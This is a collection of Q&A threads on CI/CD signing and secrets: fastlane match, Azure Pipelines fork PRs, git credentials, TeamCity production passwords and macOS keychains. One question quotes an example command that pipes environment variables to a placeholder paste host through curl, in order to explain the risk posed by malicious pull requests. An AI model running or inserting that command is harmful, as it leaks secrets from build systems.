I have developer account with multiple apps. I am using fastlane match to generate certs and profile. Now using match it creates new certs. Check below code how I generate it.
lane :GenerateCerts do
match(app_identifier: "dev", type: "development")
match(app_identifier: "stage", type: "development")
match(app_identifier: "stage", type: "appstore")
end
I already have crossed the limit on developer account to generate new iOS Distribution certs so I am not able to generate a new one. But I guess that certificate on dev portal can be used for generating profiles.
How can I use the certificate already in the portal to generate profiles?
Also, I need to manually set the profiles in Xcode for different configurations. Which command could be helpful to configure certificates in Xcode generated by match, cert, sigh?
What is the best practice for following case when I have single developer account for multiple apps?
Creating different git repo for different apps for fastlane match
Single repo for all apps.
For now I am using first one. If you have any better suggestions please help.
How can I use the certificate already there in portal to generate profiles?
This use case is not supported by match. Match only supports syncing profiles it created. If you want to work around this, you can manually create an identical, encrypted git repo and it will work from there. There are instructions for modifying one on the advanced documentation page
Instead, you could review the source code for match, which uses cert and sigh under the hood, and create a custom action for your specific use case.
But honestly it's easier to just destroy the existing certs and make new ones with match.
Also, I need to manually set the profiles in Xcode for different configurations. Which command could be helpful to configure certificates in Xcode generated by match, cert, sigh?
To clarify:
cert will get (or create, if necessary) a code signing certificate
sigh will get (or create, if necessary) a provisioning profile signed with a code signing certificate
match calls the above commands and syncs their outputs via an encrypted git repo
So if you want to configure certificates, use cert.
What is the best practice for following case when I have single developer account for multiple apps?
There's not really a best practice here that I know of. You have a few options, each with their own tradeoffs:
Use one repo per app. This benefits from complete isolation by project which can be helpful for security purposes but you'll need to sync the distribution profiles by hand (using the advanced technique I linked above)
Use one repo, with one branch per app. This lets you sync the same certificates around for several apps, but has a security risk because anyone with access to this repo has more privileges than they need (unless everyone works on everything)
Use one repo for distribution credentials, with an additional per-app repo for development credentials.
The second options will require use of the match_branch option which can be passed in your Fastfile, or (my preference) specified in your Matchfile to make your Fastfile cleaner. For final option, you could make use of the for_lane command to override an option when called from a particular lane. For example, your Matchfile might look like:
git_url "git#github.com:my_org/my_repo_name.git"
type 'development'
readonly true
for_lane :deploy_to_app_store do
type 'appstore'
git_url "git#github.com:my_org/my_distribution_cert_repo.git"
end
Related
I wanted to try provisioning my app resources in Azure using the TeamsToolkit, but it fails creating the resource group since my company requires 4 tags to be added.
Is there a way to tell the toolkit to either add those tags or create the resource group myself and make it aware of it?
I tried doing with Teams Toolkit and didn't find any option to configure the resources (choose existing or setup policy).
Following the doc also there's no mention about doing such - Deploy your app to azure and even on the market place it is not
mention that we can configure it.
I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we could not limit the PR doesn't change at least some critical files.
As workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually building these contributions, which give you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.
I am running Git on OSX Mavericks and have not had issues until now. What has changed is that I'm trying to use two Github accounts on different repos on the same computer.
The problem is that the osx-keychain is storing the login information from my first account. That was terrific before, but whenever I try to commit or push from my new Github account, it is defaulting to use the keychain's username and password values, and ignoring the locally-defined git config (or even global git config!) files.
I can delete my osx-keychain, and then push to the new account, but in doing so it will create a new keychain for that account, which puts me back at square one: able to push to my secondary account with the new keychain values but locked out of my primary account.
So I'm stuck in an "either-or" situation, and I'm really hoping there's a "both" solution. Any help?
P.S. I have tried this solution, and it did not work, as the osx-keychain appeared to override the SSH Identity functionality
If you are using https url, then the solution you mention wouldn't have any effect: it is for multiple ssh keys.
Regarding https, this question mentions a few solutions, including:
By default gitcredentials only considers the domain name.
If you want git to consider the full path (e.g. if you have multiple GitHub accounts), set the useHttpPath variable to true, as described at gitcredentials.
Note that changing this setting will ask your credentials again for each URL.
By default, Git does not consider the "path" component of an http URL to be worth matching via external helpers.
This means that a credential stored for https://example.com/foo.git will also be used for https://example.com/bar.git.
If you do want to distinguish these cases, set this option to true.
Also, make sure your https url incudes your account name:
git clone https://user1#github.com/auser/aprojectX
git clone https://user2#github.com/auser/aprojectY
That will help a credential helper to known which account/password it should be looking for.
Finally, the authentication you are using for accessing a git repo hosting service has nothing to do with:
git config (--global) user.name
That last config is only for setting the author associated with your local commits.
It is not for selecting the account used to access a remote hosting website.
We currently use TeamCity to build a deployment artifact, then a further TeamCity task takes that artifact and deploys it to our development and testing servers on demand.
We can store the passwords and other secret data in properties files that we can check into source control, as these are all internal servers and the developers have full access to them.
However for release to Production (and our final test layer) there are secret passwords and configuration that we don't want checked into the normal source control, or to have development be able to discover the passwords. So to do 'real' deployments we have to hand the artifact over to another team and they maintain a properties file with the production values.
What methods exist to store these secrets and allow TeamCity to run a deploy without ever leaking the secrets out?
(note I am one of the devs and it is not a trust issue... I don't want to have the ability to find out prod passwords so I can never accidently know them and do some horrific damage!)
Probably what you need here, is to create a separate project with narrower scope of permissions (for example, allow only certain people to edit build configurations). In this project create a build configuration, responsible for deployment. In this configuration, you can define a Typed Parameter of type 'password' to store the password to the production environment.
Another option is to use Deployer Plugin, especially its ability to deploy over ssh with private key authentication
If you are OK to use a third party solution, consider using a solution like CloudMunch which can help you to perform release management functions with these secure parameters collected at deploy time and encrypted post deployment.
Disclaimer: I work with CloudMunch
You can do 2 things.
Use a teamcity project to deploy artefacts for production only. This will only be accessible to ops members.
Teamcity also supports running agents with different user ids. You can create a new user id which can have access to the production "secrets" (passwords and configuration). Use this id to run the targets in the 1st step.
As described in question CLI: Switch keychains in order to sign an xcodebuild I have the problem of having to use two keychains for running xcodebuild. I need this because our enterprise & appstore identities are called the same.
When I try the proposed solution it works fine, if I'm running only one xcodebuildat a time. But I'm using a buildserver (hudson or jenkins) running multiple builds in parallel. Each build job should build the enterprise and the appstore version of an app, therefore it has to use different keychains. When changing the keychain list as proposed, this always affects all running processes of the current user. Therefore parallel builds of different projects would be affected and basically fail or use the wrong keychain.
I've tried several workarounds to open a new security context, which seems to host the keychain information:
I used login -f ... to start a new login session, hoping it will use an independent security context. But when I change the keychain settings in the session it also affects the other login session.
I used ssh localhost ... to start a new login session, but unfortunately with the same result.
It seems, that the security context is bound to the user and not to a dedicated session. Unfortunately I cannot find any information about those security contexts using Google.
Is there any way to run several processes for a dedicated user having different keychains active and unlocked?